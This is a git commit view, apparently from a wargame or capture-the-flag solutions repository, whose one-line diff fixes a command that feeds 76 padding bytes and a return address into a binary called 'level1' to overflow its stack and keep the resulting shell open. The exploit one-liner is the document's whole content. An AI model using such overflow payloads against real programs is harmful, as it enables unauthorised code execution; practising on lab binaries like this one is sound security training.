fix: add the python to the exploit command

This commit is contained in:
0x35c 2025-04-28 17:10:55 +02:00
parent 291c839668
commit 89d0e5d442

View File

@ -1 +1 @@
(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1 (python -c 'print("a"*76 + "\x44\x84\x04\x08")'; cat) | ./level1